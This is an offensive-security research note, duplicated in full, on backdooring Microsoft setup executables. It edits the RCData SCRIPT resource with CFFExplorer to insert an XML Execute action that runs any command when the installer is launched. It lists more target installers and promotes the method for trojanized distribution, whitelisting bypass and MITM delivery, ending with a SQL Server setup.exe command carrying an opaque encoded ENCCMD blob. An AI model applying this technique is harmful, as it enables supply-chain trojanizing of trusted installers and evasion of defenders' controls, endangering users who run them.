nullbind/BackDoor Setup Exe

## BackDoor Setup Exe
Author: Scott Sutherland, 2017
Descript: Summary of how to backdoor an existing setup file in Windows.
Note: Not sure if anyone covered this already? Seems kind of like a Casey Smith thing.

How to Backdoor Existing Setup Files by Modifying Config Files Stored in RCData

In this example, the lyncsdk.exe will be used. It can be download here: https://www.microsoft.com/en-us/download/details.aspx?id=36824
lyncentry.exe also works as an example.

Below are some basic instructions.

1. Open file with CFFExplorer.
2. In the object tree on the left side, navigate to the "Resource Editor".
3. In the tab for the lyncsdk.exe, expand RCData.
4. Right-click on "SCRIPT" and choose "Save Resource (Raw)".  Save the file as config.xml.
5. Open config.xml in your favorite text editor and add the following XML after line 22.

<Action type="Execute">
<CommandLine>cmd.exe /c "echo more evil > c:\temp\evil.txt"</CommandLine>
</Action>

Note: The XML above can be used to execute arbitrary commands when the setup file is run. In this example, I just have it write "more evil" to a text file named "c:\temp\evil.txt"

6. Save the changes to config.xml.
7. Navigate back to CFFExplorer, select the tab for the lyncsdk.exe, and expand RCData.
8. Right-click on "SCRIPT" and choose "Replace Resource (Raw)".
9. Choose your modifified config.xml.
10. Save the save to overwrite the existing lyncsdk.exe file.

Now it will run their code along with your command. :)

Possbile Use Cases

Below are a few possible use cases:
- Backdoor setup file used for distrobution
- Possibly bypass whitelisting
- Possibly result in execution of command or bypasses by analyzing the xml config code.
- mitm backdoor?

Refferrences:

https://msdn.microsoft.com/en-us/library/windows/desktop/aa381039(v=vs.85).aspx
http://www.csn.ul.ie/~caolan/publink/winresdump/winresdump/doc/resfmt.txt
http://reboot.pro/topic/16405-backdoors-the-easy-way/

Future Research:

0: what type of installer is this? GetMSIProductProperties msi installation file...?
https://msdn.microsoft.com/en-us/library/windows/desktop/aa370905(v=vs.85).aspx
Main question: how do we location setup files that ship with ms, once we modify them, can they bypass white listing? get-pe?
second question: spend time reverse those identify to look for code execution / bypasses via their functionality in the xml.


how do we scan file headers for rcdata headers with powershell? <OPatchInstall version="1.0">
https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-PEHeader.ps1
https://github.com/mattifestation/PowerShellArsenal/tree/master/Parsers
http://www.fuzzysecurity.com/tutorials/20.html
https://msdn.microsoft.com/en-us/library/windows/desktop/aa370905(v=vs.85).aspx


More info

There is a second common type as well:
examples: weindows7upgradadvisorsetupexe dxwebsetup.exe Office2003SP3-KB923618-FullFile-ENU.exe
find more here by fuzzin gthe download id: https://www.microsoft.com/en-us/download/confirmation.aspx?id=20
other common options in RCDATA section of resource tables for ms provided exe installs include
runprogram
postrunprogram
usrqcmd
admqcmd


SCRIPT example
https://www.microsoft.com/en-us/download/confirmation.aspx?id=10
excelviewer.exe
word2007-kb974631-fullfile-x86-glb.exe
office2007-kb970012-fullfile-x86-glb.exe

automation notes
- the Resource directory head lists the offsets for the RCDATA, script etc.

"Patch wrapper and installer engine" in the configuration files section of the resource table.
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.1.0"

Note: not all ms installers have one of the two execution header build it, question is can we add it?

also target: pdate.exe or Hotfix.exe,


other interesting actions
					<Action type="CreateFolder">
						<Path>$(SYS.ARGS.EXTRACTPATH)</Path>
					</Action>
<Action type="ExtractFile">

-- list and modify resource tables
https://msdn.microsoft.com/en-us/library/windows/desktop/ms648008(v=vs.85).aspx#_win32_Creating_a_Resource_List
https://github.com/mubix/ditto/blob/master/ditto.cpp


you may also be able to execution the script straight from setup.exe files:
white list bypass - weee!
\\stuff\C$\Program Files\Microsoft SQL Server\90\Setup Bootstrap\setup.exe	/qn /remote ENCCMD=A02A4FB9524BE48494C29F04C33C3E2723A79D0F4CC3D638A63F167846A91F34ACC40D8A8F37FDF3FFD17E261E8F492AA5AD4AC95D857414226A13D6C1254A6F7134A319772DDDA84934B3F6380883EBDFA943B7A4B437F9CB81683380D87991ED5C9CD1CDCB6C70B44405D944F4749B2049F139982CE9908C5F6A0EFEC726A4B6BA213E95DED6C886C392B70D534BB1C52DF535ED8657DC186760EEC295F1CA96F9C9CA3B2BD46D0309A2F129ED89EC919D061826DAAC6DA9F53C80C715E2876E65194CA6E3437D4FEFCADD8D3F73A38734FDFD3813AAB76A85CB61D91D19B2AC6744369BF0686F1F8B9C11500850A5489C54410A8020771851F34A8964DBF17831356DF0CA2CA417116E6F4D18FDD4A2B551AC80248FA4075E423FF5C03E16177443C553379C89156D7D7505DB7A3EFB6DB669C0D24CC8D9D1C2C4D49D3BE669E0ACEE6DE72AF3F462CC6CBB0D68AC384326E596CF634D88C652080B441B1FBE4922F2FBAC1829CE38C866DECDCCEBAEE35AE60E014C6614656864D58254A6284D9C5CED714296C7CD8EFE9060EFB1444CD89B847750E681D0B9729EF3B89F6ADA7870C5053303B9E336485514FC23E21E67F88C414B6EBDC4D6D44799280614C880F27A436923E64E021A18D97D7DD90A2B92848600FC92B5709F8DF7AB3724E81F6395C77C7F2667CB996CCB2E8127C63B3DD99BBE2A36A436EBA4B1F6C243F2ABC877D5D97C26ED1602DFD39F2F7387E677C632E035B82A9619C8E6D0ABBBC686C381782BA36B58516E64C77C51B204F2EE65C1F2733D0C6B771A8F38A65F4895546A4A01282907F941EE77DD8FD912567D0DC14138A12BF87801D29517CCD61DB6AF0CCEF9FA0DED2D6A64E2111494411996C95023E94ED176CA3779AF56054254C194855483190FD3D4E13C5CA812B9D44A0A89B48D8862A5A53F2C3F9561515552469331FF6BD8E601E106030B30D8B8D5E5FBC1C30E061D40D0F9647B575861D669FE6DC55A2AD69898639811A74C79A5FE18956FA48A7E3C2F2FA6198B2702A49C6BF0D1D444504845CCABF6A6B22214A87A32870373FF6C441EA1976836B893867FEFD7A54721F9639526E2166B37BF2965F7996761850693F8633D785522D736D6D00DEFB3C95E5CA62F9D5A10EC119D497C6D3ABC2906C5227AA2C1C9D76B7499D356439B6FBB651D8CB7137559882063A66DFC3BF4F9D30DCC98FEE22940442DF7FA7F6561E0C8E6BA944302BE95D82DDF8313E0E7DB1889C69C534CCFF751A7ACDB0C6B279EC0875C91230EDDFD4CAA3BCAB4E4E2D2C51C5DE360FD6C995497986BCA2038B138DBF695A3CFD345184729882CBA393304EC635A876E404D4805A05BBED9013F4A62B4BC6CEA4717D2E0ADE2E52E60A2BC9604AF6CABB985C2EA34C880ADFDDAC7AA169E9240154D4BBBE97ACE40FAED0437AAAB6BB66B97F5C468A1046C305B4F471F145067070FEDC94136B161B2129C407D3F72874C6A0AF2DA7A5BA9FCE6A58CAA48CE42D9868FEAB1E35520E7042BAA5C896C3DAA27D9291686F38376F9A8B8F42F1C1A766B857D552A51D632D55B1A166DD514DCCB31812A4EC01067F48899C6BFEFCA748D8DD9CB49C67FADC0B264D4FBA40FD89ACCABD0905D09954C2DBAFE1FFF1892B31196B03446120FD35D6BA21E3C10C9F7E2F9C4BBBD806A4CA667899971428A3C7E262A50E63B8742AE88D928A4AF859DF2963288A05DD6EDD69335118C83BA2AC1A93768B2B2B502F6F520351536D5737A3DDB1CAADBF7325DD6679C6F9A33F5FD35717041435E31C17ACDBAC6FC13F4BFB9705A2972D1F8BC61F5BE6C5E9A373C3A30A5E2CF62171771B7EBD653D3CABF9BFAFDF002CF659C89D37BE88085327289ED00552D20D2A2FC20035F1DA02C660E1125AEF0281FE0CBAD744791C4A4704F1B811715540ECC430E595067C691B0C875CFD061BED478245C737DF9F7FD98084879485F8D23E75BB91F974DEA6D8F667371B29C0C13ED748A696A5D4AEC493691A1593126301627B854305BC1529768529E5A2CBEDF2818C15E26FE32746BC906AA824219A0C0E93C2194A78B200141C573C01469C19BAB9722FCA2555732532D8CEA75D586460D7E466A1A53D7F4EB6CAAC8FCB6F04D860039DA13134257D9F87460B9B88E63A6C3A814B2D410D12197847333C687E5FCD72B1735F519C29B3351AFBA0A8EC76314E15B
	Author: Scott Sutherland, 2017
	Descript: Summary of how to backdoor an existing setup file in Windows.
	Note: Not sure if anyone covered this already? Seems kind of like a Casey Smith thing.

	How to Backdoor Existing Setup Files by Modifying Config Files Stored in RCData

	In this example, the lyncsdk.exe will be used. It can be download here: https://www.microsoft.com/en-us/download/details.aspx?id=36824
	lyncentry.exe also works as an example.

	Below are some basic instructions.

	1. Open file with CFFExplorer.
	2. In the object tree on the left side, navigate to the "Resource Editor".
	3. In the tab for the lyncsdk.exe, expand RCData.
	4. Right-click on "SCRIPT" and choose "Save Resource (Raw)". Save the file as config.xml.
	5. Open config.xml in your favorite text editor and add the following XML after line 22.

	<Action type="Execute">
	<CommandLine>cmd.exe /c "echo more evil > c:\temp\evil.txt"</CommandLine>
	</Action>

	Note: The XML above can be used to execute arbitrary commands when the setup file is run. In this example, I just have it write "more evil" to a text file named "c:\temp\evil.txt"

	6. Save the changes to config.xml.
	7. Navigate back to CFFExplorer, select the tab for the lyncsdk.exe, and expand RCData.
	8. Right-click on "SCRIPT" and choose "Replace Resource (Raw)".
	9. Choose your modifified config.xml.
	10. Save the save to overwrite the existing lyncsdk.exe file.

	Now it will run their code along with your command. :)

	Possbile Use Cases

	Below are a few possible use cases:
	- Backdoor setup file used for distrobution
	- Possibly bypass whitelisting
	- Possibly result in execution of command or bypasses by analyzing the xml config code.
	- mitm backdoor?

	Refferrences:

	https://msdn.microsoft.com/en-us/library/windows/desktop/aa381039(v=vs.85).aspx
	http://www.csn.ul.ie/~caolan/publink/winresdump/winresdump/doc/resfmt.txt
	http://reboot.pro/topic/16405-backdoors-the-easy-way/

	Future Research:

	0: what type of installer is this? GetMSIProductProperties msi installation file...?
	https://msdn.microsoft.com/en-us/library/windows/desktop/aa370905(v=vs.85).aspx
	Main question: how do we location setup files that ship with ms, once we modify them, can they bypass white listing? get-pe?
	second question: spend time reverse those identify to look for code execution / bypasses via their functionality in the xml.


	how do we scan file headers for rcdata headers with powershell? <OPatchInstall version="1.0">
	https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-PEHeader.ps1
	https://github.com/mattifestation/PowerShellArsenal/tree/master/Parsers
	http://www.fuzzysecurity.com/tutorials/20.html
	https://msdn.microsoft.com/en-us/library/windows/desktop/aa370905(v=vs.85).aspx


	More info

	There is a second common type as well:
	examples: weindows7upgradadvisorsetupexe dxwebsetup.exe Office2003SP3-KB923618-FullFile-ENU.exe
	find more here by fuzzin gthe download id: https://www.microsoft.com/en-us/download/confirmation.aspx?id=20
	other common options in RCDATA section of resource tables for ms provided exe installs include
	runprogram
	postrunprogram
	usrqcmd
	admqcmd


	SCRIPT example
	https://www.microsoft.com/en-us/download/confirmation.aspx?id=10
	excelviewer.exe
	word2007-kb974631-fullfile-x86-glb.exe
	office2007-kb970012-fullfile-x86-glb.exe

	automation notes
	- the Resource directory head lists the offsets for the RCDATA, script etc.

	"Patch wrapper and installer engine" in the configuration files section of the resource table.
	<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.1.0"

	Note: not all ms installers have one of the two execution header build it, question is can we add it?

	also target: pdate.exe or Hotfix.exe,


	other interesting actions
	<Action type="CreateFolder">
	<Path>$(SYS.ARGS.EXTRACTPATH)</Path>
	</Action>
	<Action type="ExtractFile">

	-- list and modify resource tables
	https://msdn.microsoft.com/en-us/library/windows/desktop/ms648008(v=vs.85).aspx#_win32_Creating_a_Resource_List
	https://github.com/mubix/ditto/blob/master/ditto.cpp


	you may also be able to execution the script straight from setup.exe files:
	white list bypass - weee!
	\\stuff\C$\Program Files\Microsoft SQL Server\90\Setup Bootstrap\setup.exe /qn /remote ENCCMD=A02A4FB9524BE48494C29F04C33C3E2723A79D0F4CC3D638A63F167846A91F34ACC40D8A8F37FDF3FFD17E261E8F492AA5AD4AC95D857414226A13D6C1254A6F7134A319772DDDA84934B3F6380883EBDFA943B7A4B437F9CB81683380D87991ED5C9CD1CDCB6C70B44405D944F4749B2049F139982CE9908C5F6A0EFEC726A4B6BA213E95DED6C886C392B70D534BB1C52DF535ED8657DC186760EEC295F1CA96F9C9CA3B2BD46D0309A2F129ED89EC919D061826DAAC6DA9F53C80C715E2876E65194CA6E3437D4FEFCADD8D3F73A38734FDFD3813AAB76A85CB61D91D19B2AC6744369BF0686F1F8B9C11500850A5489C54410A8020771851F34A8964DBF17831356DF0CA2CA417116E6F4D18FDD4A2B551AC80248FA4075E423FF5C03E16177443C553379C89156D7D7505DB7A3EFB6DB669C0D24CC8D9D1C2C4D49D3BE669E0ACEE6DE72AF3F462CC6CBB0D68AC384326E596CF634D88C652080B441B1FBE4922F2FBAC1829CE38C866DECDCCEBAEE35AE60E014C6614656864D58254A6284D9C5CED714296C7CD8EFE9060EFB1444CD89B847750E681D0B9729EF3B89F6ADA7870C5053303B9E336485514FC23E21E67F88C414B6EBDC4D6D44799280614C880F27A436923E64E021A18D97D7DD90A2B92848600FC92B5709F8DF7AB3724E81F6395C77C7F2667CB996CCB2E8127C63B3DD99BBE2A36A436EBA4B1F6C243F2ABC877D5D97C26ED1602DFD39F2F7387E677C632E035B82A9619C8E6D0ABBBC686C381782BA36B58516E64C77C51B204F2EE65C1F2733D0C6B771A8F38A65F4895546A4A01282907F941EE77DD8FD912567D0DC14138A12BF87801D29517CCD61DB6AF0CCEF9FA0DED2D6A64E2111494411996C95023E94ED176CA3779AF56054254C194855483190FD3D4E13C5CA812B9D44A0A89B48D8862A5A53F2C3F9561515552469331FF6BD8E601E106030B30D8B8D5E5FBC1C30E061D40D0F9647B575861D669FE6DC55A2AD69898639811A74C79A5FE18956FA48A7E3C2F2FA6198B2702A49C6BF0D1D444504845CCABF6A6B22214A87A32870373FF6C441EA1976836B893867FEFD7A54721F9639526E2166B37BF2965F7996761850693F8633D785522D736D6D00DEFB3C95E5CA62F9D5A10EC119D497C6D3ABC2906C5227AA2C1C9D76B7499D356439B6FBB651D8CB7137559882063A66DFC3BF4F9D30DCC98FEE22940442DF7FA7F6561E0C8E6BA944302BE95D82DDF8313E0E7DB1889C69C534CCFF751A7ACDB0C6B279EC0875C91230EDDFD4CAA3BCAB4E4E2D2C51C5DE360FD6C995497986BCA2038B138DBF695A3CFD345184729882CBA393304EC635A876E404D4805A05BBED9013F4A62B4BC6CEA4717D2E0ADE2E52E60A2BC9604AF6CABB985C2EA34C880ADFDDAC7AA169E9240154D4BBBE97ACE40FAED0437AAAB6BB66B97F5C468A1046C305B4F471F145067070FEDC94136B161B2129C407D3F72874C6A0AF2DA7A5BA9FCE6A58CAA48CE42D9868FEAB1E35520E7042BAA5C896C3DAA27D9291686F38376F9A8B8F42F1C1A766B857D552A51D632D55B1A166DD514DCCB31812A4EC01067F48899C6BFEFCA748D8DD9CB49C67FADC0B264D4FBA40FD89ACCABD0905D09954C2DBAFE1FFF1892B31196B03446120FD35D6BA21E3C10C9F7E2F9C4BBBD806A4CA667899971428A3C7E262A50E63B8742AE88D928A4AF859DF2963288A05DD6EDD69335118C83BA2AC1A93768B2B2B502F6F520351536D5737A3DDB1CAADBF7325DD6679C6F9A33F5FD35717041435E31C17ACDBAC6FC13F4BFB9705A2972D1F8BC61F5BE6C5E9A373C3A30A5E2CF62171771B7EBD653D3CABF9BFAFDF002CF659C89D37BE88085327289ED00552D20D2A2FC20035F1DA02C660E1125AEF0281FE0CBAD744791C4A4704F1B811715540ECC430E595067C691B0C875CFD061BED478245C737DF9F7FD98084879485F8D23E75BB91F974DEA6D8F667371B29C0C13ED748A696A5D4AEC493691A1593126301627B854305BC1529768529E5A2CBEDF2818C15E26FE32746BC906AA824219A0C0E93C2194A78B200141C573C01469C19BAB9722FCA2555732532D8CEA75D586460D7E466A1A53D7F4EB6CAAC8FCB6F04D860039DA13134257D9F87460B9B88E63A6C3A814B2D410D12197847333C687E5FCD72B1735F519C29B3351AFBA0A8EC76314E15B